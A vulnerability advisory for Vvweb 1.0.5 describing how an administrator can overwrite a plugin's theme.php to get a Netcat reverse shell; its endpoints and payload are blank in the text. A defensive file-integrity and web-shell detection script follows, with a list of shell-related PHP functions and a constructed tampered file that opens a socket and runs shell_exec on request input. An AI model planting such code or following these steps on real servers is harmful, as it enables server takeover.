Key Information        Details
Software Type          Web App
Software Name          Vvweb
Affected Version       1.0.5
Software Vendor        Vvweb
Software Link          https://github.com/givanz/Vvweb
Severity               Critical
CVSS Score             9.1
CVE Link               Pending
Affected Assets        163+
Discovery Date         January 3, 2025
PoC Exploit            https://gist.github.com/OxHamy/f16fb399f8dd3a973acadc18fa07b1cb

Description

Administrators can access and modify plugin code, and no validation mechanism prevents malicious code from being saved and executed. An authenticated administrator can modify plugins via the endpoint: . Through this endpoint, the plugin's PHP file (theme.php) can be overwritten with arbitrary PHP, which runs with the privileges of the web server process and gives the attacker shell access to the web server.

Reproduction Steps

1. Access the following endpoint:
2. Locate and edit , replacing its content with the following code:
3. Set the IP address and port in the payload to those of your listener (e.g., Netcat).
4. Save the PHP file and execute it by opening:
5. Monitor your Netcat listener for the incoming reverse shell connection.

On its own, this vulnerability requires administrator credentials and so may not cause immediate impact, but when combined with password brute-forcing or XSS in the admin panel, it can lead to cookie theft and full compromise of the system.

Proof-of-Concept (PoC) Video

A PoC video is provided, demonstrating the exploitation process.
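The reproduction steps above come down to one observable event: a PHP file under the plugin directory is rewritten to call functions a theme template has no business calling. The following script is an added example written for this page, not Vvweb code and not the PoC from the gist; it assumes nothing about the elided endpoints and works purely on the filesystem. It records a SHA-256 manifest of a known-good install, reports files that were later modified, added or removed, and scans PHP files for calls typical of web shells and reverse shells (shell_exec, fsockopen, proc_open and friends, plus the backtick operator). The plugin layout, the file contents and the demo() helper are constructed for illustration.

```python
"""Detect tampering of plugin/theme PHP files: integrity diff plus content heuristics.
Added example for this advisory; not part of Vvweb. Paths and samples are constructed."""
import hashlib
import os
import re
import tempfile
from dataclasses import dataclass

# Functions that legitimate theme templates rarely need but web shells and
# reverse shells almost always use. Extend to taste for your code base.
SUSPICIOUS_CALLS = (
    "shell_exec", "exec", "system", "passthru", "popen", "proc_open",
    "pcntl_exec", "fsockopen", "eval", "assert", "base64_decode",
    "gzinflate", "str_rot13",
)
CALL_RE = re.compile(r"\b(" + "|".join(SUSPICIOUS_CALLS) + r")\s*\(", re.IGNORECASE)
# The PHP backtick operator is shell_exec() in disguise.
BACKTICK_RE = re.compile(r"`[^`]+`")


@dataclass
class Finding:
    path: str
    line_no: int
    call: str
    line: str


def scan_php_file(path: str) -> list[Finding]:
    """Return one Finding per suspicious call found in a single PHP file."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for n, line in enumerate(fh, 1):
            for m in CALL_RE.finditer(line):
                findings.append(Finding(path, n, m.group(1).lower(), line.rstrip()))
            if BACKTICK_RE.search(line):
                findings.append(Finding(path, n, "backtick", line.rstrip()))
    return findings


def scan_plugin_dir(root: str) -> list[Finding]:
    """Walk root and scan every PHP-like file, in a stable order."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith((".php", ".phtml", ".inc")):
                findings.extend(scan_php_file(os.path.join(dirpath, name)))
    return findings


def hash_tree(root: str) -> dict[str, str]:
    """Map relative path -> sha256 for every file under root (the baseline manifest)."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                manifest[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return manifest


def changed_files(baseline: dict[str, str], current: dict[str, str]) -> dict[str, str]:
    """Return {relative_path: 'modified' | 'added' | 'removed'} for every difference."""
    out = {}
    for rel in baseline.keys() | current.keys():
        if rel not in current:
            out[rel] = "removed"
        elif rel not in baseline:
            out[rel] = "added"
        elif baseline[rel] != current[rel]:
            out[rel] = "modified"
    return out


# Constructed samples: a harmless theme file and the same file after tampering.
BENIGN_THEME = "<?php\n// constructed sample: harmless theme file\necho htmlspecialchars($title);\n"
TAMPERED_THEME = (
    "<?php\n// constructed sample: theme file rewritten through the plugin editor\n"
    "$s = fsockopen($_GET['h'], 4444);\n"
    "echo shell_exec($_GET['c']);\n"
)


def demo() -> tuple[dict[str, str], list[Finding]]:
    """Baseline a clean install, simulate the edit of theme.php, then run both checks."""
    with tempfile.TemporaryDirectory() as root:
        plugin = os.path.join(root, "plugins", "demo")   # hypothetical plugin layout
        os.makedirs(plugin)
        theme = os.path.join(plugin, "theme.php")
        with open(theme, "w", encoding="utf-8") as fh:
            fh.write(BENIGN_THEME)
        baseline = hash_tree(root)                       # taken from the known-good install
        with open(theme, "w", encoding="utf-8") as fh:   # the edit the advisory describes
            fh.write(TAMPERED_THEME)
        return changed_files(baseline, hash_tree(root)), scan_plugin_dir(root)


if __name__ == "__main__":
    changed, findings = demo()
    for rel, status in changed.items():
        print(f"{status}: {rel}")
    for f in findings:
        print(f"{f.path}:{f.line_no}: {f.call}() -> {f.line}")
```

In production the baseline manifest is taken from the release archive or a clean deployment and stored outside the web root; run the diff from a cron job or as a post-deploy check, and treat any "modified" PHP file under the plugin directory as an incident, since Vvweb's editor gives an administrator no legitimate reason to change theme.php on a live server.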